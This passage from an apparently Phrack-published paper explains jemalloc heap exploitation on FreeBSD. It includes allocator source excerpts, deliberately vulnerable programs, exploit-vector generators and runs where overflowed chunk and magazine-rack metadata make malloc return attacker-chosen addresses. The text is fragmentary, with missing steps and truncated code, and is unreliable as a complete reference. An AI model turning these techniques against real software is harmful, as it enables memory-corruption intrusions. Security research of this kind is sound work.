temp = 0x28203080
...
Setting up a run for the next size class
three = 0x28204040
Notice how the memory region numbered 'four' (64 bytes) points exactly
where the chunk named 'temp' (32 bytes) starts. Voila :)
------[ 3.3.2 - Chunk (arena_chunk_t)
Before continuing with our analysis, let's set the foundations of the
test case we will cover.
[[Arena #1 header][R...R][C...C]]
The low level function responsible for allocating memory pages (called
'pages_map()') is used by 'chunk_alloc_mmap()' in a way that makes it
possible for several distinct arenas (and any possible arena extensions)
to be physically adjacent. So, once the attacker requests a bunch of
new allocations, the memory layout may resemble the following figure.
/* [3-8] */
print_arena_chunk(base2);
/* [3-9] */
/* Allocate one more region right after the first region of the
* new chunk. This is done for demonstration purposes only.
*/
p2 = malloc(16);
/* [3-10] */
if(argc > 1) {
    if((fd = open(argv[1], O_RDONLY)) > 0) {
        /* Read the contents of the given file. We assume this file
         * contains the exploitation vector.
         */
        memset(buffer, 0, sizeof(buffer));
        l = read(fd, buffer, sizeof(buffer));
        close(fd);
/* [3-11] */
/* [3-12] */
/* [3-13] */
Before going further, the reader is advised to read the comments and the
code above very carefully. You can safely ignore 'print_arena_chunk()'
and 'print_region()', they are defined in the file lib.h found in the code
archive and are used for debugging purposes only. The snippet is split
into six parts, distinguished by their corresponding '[3-x]' tags.
Briefly, in part [3-8] the vulnerable program performs a number of
allocations in order to fill up the available space served by the
first arena. This emulates an attacker who somehow controls the order
of allocations and deallocations on the target, a fair and very common
prerequisite. Additionally, the last call to 'malloc()' (the one before
the while loop breaks) forces jemalloc to allocate a new arena chunk
and return its first available memory region. Part [3-9] performs one
more allocation, one that will lie right next to the first (that is,
the second region of the new chunk). This final allocation is there
for demonstration purposes only (check the comments for more details).
Part [3-10] is where the actual overflow takes place, and part [3-11]
calls 'free()' on one of the regions of the newly allocated chunk.
Before explaining the rest of the vulnerable code, let's see what
happens when 'free()' is called on a memory region.
void
free(void *ptr)
{
    ...
    if (ptr != NULL) {
        ...
        idalloc(ptr);
    }
}
static void
arena_dalloc_large(arena_t *arena, arena_chunk_t *chunk, void *ptr)
{
    malloc_spin_lock(&arena->lock);
    ...
    size_t pageind = ((uintptr_t)ptr - (uintptr_t)chunk) >>
        PAGE_SHIFT; /* [3-18] */
    size_t size = chunk->map[pageind].bits & ~PAGE_MASK; /* [3-19] */
    ...
    arena_run_dalloc(arena, (arena_run_t *)ptr, true);
    malloc_spin_unlock(&arena->lock);
}
There are two important things to notice in the snippet above. The
first is the way 'pageind' is calculated. Variable 'ptr' points to the
start of the memory region to be free()'ed, while 'chunk' is the
address of the corresponding arena chunk. For a chunk that starts at
e.g. 0x28200000, the first region given out to the user may start at
0x28201030, mainly because of the overhead of the chunk, arena and run
headers as well as their bitmaps. A careful reader will notice that
0x28201030 is more than a page away from the start of the chunk, so
'pageind' is greater than or equal to 1. It is for this reason that we
are mostly interested in overwriting 'chunk->map[1]' and not
'chunk->map[0]'. The second thing to catch our attention is the fact
that, at [3-19], 'size' is calculated directly from the 'bits' element
of the overwritten bitmap. This size is later converted to the number
of pages it comprises, so the attacker can directly control the number
of pages to be marked as free. Let's see 'arena_run_dalloc()':
static void
arena_run_dalloc(arena_t *arena, arena_run_t *run, bool dirty)
{
    arena_chunk_t *chunk;
    size_t size, run_ind, run_pages;
    ...
    run_pages = (size >> PAGE_SHIFT); /* [3-20] */
    ...
    if (dirty) {
        ...
        chunk->ndirty += run_pages;
        arena->ndirty += run_pages;
    }
    else {
        ...
    }
    chunk->map[run_ind].bits = size | (chunk->map[run_ind].bits &
        PAGE_MASK);
    chunk->map[run_ind+run_pages-1].bits = size |
        (chunk->map[run_ind+run_pages-1].bits & PAGE_MASK);
    ...
    arena_avail_tree_insert(&arena->runs_avail,
        &chunk->map[run_ind]); /* [3-22] */
    ...
}
Continuing with our analysis, one can see that at [3-20] the same size
that was calculated in 'arena_dalloc_large()' is now converted to a
number of pages, and then all 'map[]' elements that correspond to these
pages are marked as dirty (notice that the 'dirty' argument passed to
'arena_run_dalloc()' by 'arena_dalloc_large()' is always true). The
rest of the 'arena_run_dalloc()' code, which is not shown here, is
responsible for forward and backward coalescing of dirty pages.
Although not directly relevant to our demonstration, coalescing is
something an attacker should keep in mind while developing a reliable
real-life exploit.
Last but not least, it's interesting to note that, since the attacker
controls the 'arena' pointer, the map elements that correspond to the
freed pages are inserted into the given arena's red-black tree. This
can be seen at [3-22], where 'arena_avail_tree_insert()' is actually
called. One may think that, since red-black trees are involved in
jemalloc, their pointer arithmetic can be abused to achieve a '4 bytes
anywhere' write primitive. We urge all interested readers to have a
look at rb.h, the file that contains the macro-based red-black tree
implementation used by jemalloc (WARNING: don't try this while sober).
2) Overwrite the 'arena' pointer of arena B's chunk and make it point
to an already existing arena. The address of the very first arena of
a process (call it arena A) is always fixed since it's declared as
static. This will prevent the allocator from accessing a bad address
and eventually segfaulting.
3) Force or let the target application free() any chunk that belongs to
arena B. We can deallocate any number of pages as long as they are marked
as allocated in the jemalloc metadata. Trying to free an unallocated page
will result in the red-black tree implementation of jemalloc entering
an endless loop or, rarely, segfaulting.
The exploit code for the vulnerable program presented in this section
can be seen below. It was developed on an x86 FreeBSD-8.2-RELEASE
system, so the metadata offsets may vary on your platform. Given the
address of an existing arena (arena A of step 2), it creates a file
containing the exploitation vector. This file should be passed as an
argument to the vulnerable target (full code in file exploit-chunk.c):
if(argc != 2) {
    fprintf(stderr, "%s <arena>\n", argv[0]);
    return 0;
}
memset(buffer, 0, sizeof(buffer));
p = buffer;
strncpy(p, "1234567890123456", 16);
p += 16;
/* Arena address. */
*(size_t *)p = (size_t)strtoul(argv[1], NULL, 16);
p += sizeof(size_t);
p += 32;
It is now time for some action. First, let's compile and run the vulnerable
code.
$ ./vuln-chunk
# Chunk 0x28200000 belongs to arena 0x8049d98
# Chunk 0x28300000 belongs to arena 0x8049d98
...
# Region at 0x28301030
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
p3 = 0x28302000
# Region at 0x28301030
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
The output is what one expects it to be. First, the vulnerable code forces
the allocator to initialize a new chunk (0x28300000) and then requests
a memory region which is given the address 0x28301030. The next call to
'malloc()' returns 0x28302000. So far so good. Let's feed our target
with the exploitation vector and see what happens.
$ ./exploit-chunk 0x8049d98
$ ./vuln-chunk exploit2.v
# Chunk 0x28200000 belongs to arena 0x8049d98
# Chunk 0x28300000 belongs to arena 0x8049d98
...
Read 56 bytes
# Region at 0x28301030
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
p3 = 0x28301000
# Region at 0x28301030
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
As you can see the second call to 'malloc()' returns a new region
'p3 = 0x28301000' which lies 0x30 bytes before 'first' (0x28301030)!
2) Overwrite of the run metadata (in case the overflowed region is the
last in a run).
3) Overwrite of the arena chunk metadata (in case the overflowed region
is the last in a chunk).
That said, we believe we have covered most of the cases an attacker
may encounter. Feel free to contact us if you think we have missed
something important.
mag_rack_t *
mag_rack_create(arena_t *arena)
{
    ...
    return (arena_malloc_small(arena, sizeof(mag_rack_t) +
        (sizeof(bin_mags_t) * (nbins - 1)), true));
}
A size of 240 is actually serviced by the bin holding regions of 256
bytes. Issuing calls to 'malloc(256)' will therefore eventually yield a
user-controlled region physically bordering a 'mag_rack_t'. The
following vulnerable code emulates this situation (file vuln-mag.c):
    if(arg)
        strcpy(v, (char *)arg);
    return NULL;
}
if(argc != 3) {
    printf("%s <thread_count> <buff>\n", argv[0]);
    return 0;
}
tcount = atoi(argv[1]);
tid = (pthread_t *)alloca(tcount * sizeof(pthread_t));
pthread_join(vid, NULL);
for(i = 0; i < tcount; i++)
    pthread_join(tid[i], NULL);
pthread_exit(NULL);
}
if(argc != 2) {
    printf("%s <mag_t address>\n", argv[0]);
    return 1;
}
fake_mag_t_p = (size_t)strtoul(argv[1], NULL, 16);
$ ./exploit-mag
./exploit-mag <mag_t address>
$ ./exploit-mag 0xdeadbeef
[*] Assuming fake mag_t is at 0xdeadbeef
[*] Preparing input buffer
[*] Executing the vulnerable program
[*] 0xbfbfedd6
...
$ ./exploit-mag 0xbfbfedd6
[*] Assuming fake mag_t is at 0xbfbfedd6
[*] Preparing input buffer
[*] Executing the vulnerable program
[*] 0xbfbfedd6
[vuln] v = 0x28311100
[673283456] p1 = 0x28317800
...
[673283456] p2 = 0x42424242
[673282496] p2 = 0x3d545f47
Neat. One of the victim threads, the one whose magazine rack was
overflowed, returns an arbitrary address as a valid region. Overwriting
the thread caches is probably the most lethal attack, but it suffers
from a limitation that we do not consider serious. Since the returned
memory region and the 'bin_mags[]' element both receive arbitrary
addresses, the process segfaults either on the deallocation of 'p2' or
once the thread dies by explicitly or implicitly calling
'pthread_exit()'. Possible shellcodes should therefore be triggered
_before_ the thread exits or the memory region is freed. Fair
enough... :)
For a detailed case study on jemalloc heap overflows see the second Art of
Exploitation paper in this issue of Phrack.
This paper is the first public treatment of jemalloc that we are aware
of. In the near future, we are planning to research how one can corrupt
the various red-black trees used by jemalloc for housekeeping. The
rbtree implementation (defined in rb.h) is fully based on preprocessor
macros and is quite complex in nature. Although we have already
debugged it, due to lack of time we didn't attempt to exploit the
various tree operations performed on rbtrees. We hope that someone will
continue our work from where we left off. If no one does, then you
definitely know whose articles you'll soon be reading :)
--[ 6 - Conclusion
Many thanks to the Phrack staff for their comments. Also, thanks to George
Argyros for reviewing this work and making insightful suggestions.
Finally, we would like to express our respect to Jason Evans for such a
leet allocator. No, that isn't ironic; jemalloc is, in our opinion, one of
the best (if not the best) allocators out there.
--[ 7 - References
[UJEM] unmask_jemalloc
- https://github.com/argp/unmask_jemalloc
--[ 8 - Code
--[ EOF